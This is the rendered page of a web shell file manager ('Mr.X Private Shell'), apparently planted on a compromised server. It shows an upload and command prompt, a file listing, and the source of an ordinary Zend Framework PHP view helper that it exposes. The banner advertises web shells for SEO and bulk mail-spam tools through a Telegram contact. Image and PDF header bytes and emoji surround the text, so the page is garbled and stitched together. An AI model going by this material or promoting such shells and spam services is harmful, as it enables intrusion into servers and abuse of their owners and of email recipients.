xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace Configuration\View\Helper;

use Zend\View\Helper\AbstractHelper,
    Configuration\DirectiveContainer;

class DirectiveXml extends AbstractHelper
{

    /**
     * @param integer $severity
     * @return string
     */
    public function __invoke(DirectiveContainer $directive)
    {

        $units      = ($directive->getUnits()) ? '<units><![CDATA['.$directive->getUnits().']]></units>' : '';
        $listValues = '<listValues>';
        if ($directive->getlistValues()) {
            foreach ((array) $directive->getlistValues() as $key => $value) {
                $listValues .= '<listValue><name><![CDATA['.$key.']]></name><value><![CDATA['.$value.']]></value></listValue>';
            }
        }
        $listValues    .= '</listValues>';
        // output sanitation for ZSRV-7503
        $fileValue     = preg_replace('/^"(.+)"$/', '$1', $directive->getFileValue());
        $defaultValue  = preg_replace('/^"(.+)"$/', '$1', $directive->getDefaultValue());
        $previousValue = preg_replace('/^"(.+)"$/', '$1', $directive->getPreviousValue());
        return <<<XML
			
<directive>
					 <name>{$this->getView()->escapeHtml($directive->getName())}</name>
					 <context>{$directive->getContext()}</context>
					 <contextName>{$directive->getContextName()}</contextName>
					 <section>{$directive->getSection()}</section>
					 <fileValue><![CDATA[{$fileValue}]]></fileValue>
					 <defaultValue><![CDATA[{$defaultValue}]]></defaultValue>
					 <isMemoryOnly><![CDATA[{$directive->isMemoryOnly()}]]></isMemoryOnly>
					 <isRequiresRestart><![CDATA[{$directive->isRequiresRestart()}]]></isRequiresRestart>
					 <previousValue><![CDATA[{$previousValue}]]></previousValue>
					 <description><![CDATA[{$directive->getDescription()}]]></description>
					 <type>{$this->getView()->escapeHtml($directive->getType())}</type>
					 {$units}
					 {$listValues}
					 <visibility>{$directive->getVisibility()}</visibility>
		 </directive>
XML;
    }
}

Filemanager

Name Type Size Permission Actions
DaemonJson.php File 2.45 KB 0644
DaemonXml.php File 2.52 KB 0644
DirectiveJson.php File 1.7 KB 0644
DirectiveXml.php File 1.93 KB 0644
ExtensionJson.php File 1.48 KB 0644
ExtensionXml.php File 1.28 KB 0644
ZGridDirectives.php File 800 B 0644
licenseChangeJson.php File 922 B 0644
licenseChangeXml.php File 979 B 0644
licenseInfoJson.php File 1.6 KB 0644
licenseInfoManagerJson.php File 522 B 0644
licenseInfoManagerXml.php File 428 B 0644
licenseInfoXml.php File 1.53 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1